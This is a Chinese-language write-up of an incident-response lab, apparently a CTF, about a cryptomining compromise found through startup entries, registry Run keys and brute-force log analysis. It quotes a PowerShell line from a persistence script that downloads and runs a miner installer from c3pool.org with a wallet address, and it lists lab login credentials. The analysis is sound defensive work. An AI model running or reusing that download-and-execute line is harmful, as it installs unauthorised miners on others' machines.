挖矿事件

信息

前景需要：机房运维小陈，下班后发现还有工作没完成，然后上机器越用越卡，请你帮他看看原因。

挑战题解：

攻击者的IP地址

攻击者开始攻击的时间

攻击者攻击的端口

挖矿程序的md

后门脚本的md5

矿池地址

钱包地址

相关账户密码：

Administrator/zgsf@123

rdp连接上机器

首先打开windows管理工具

然后就查看，有没有后门账户，有没有计划任务，查看日志，查看注册表

shell:startup

查看自启动任务

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

存在一个批处理文件，部分内容如下：

$wc.DownloadFile('https://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y;

发现挖矿域名地址c3pool.org

钱包地址：4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y

同时，火绒剑也发现

LogParser.exe日志分析

上传windows一键日志分析工具

发现存在爆破记录

ip为192.168.115.131，时间:2024-05-21 20:25:22

发现可疑文件

那么这个就是xmrig.exe挖矿程序

已知条件，是一台运维的电脑，那么说明，不会去跑任何业务，打开桌面上的表格看看

密码都是统一的，说明可能是攻击者在拿到一台的密码后进行的密码喷洒

总结

一开始电脑上没有进程，就是用工具进行分析，然后翻文件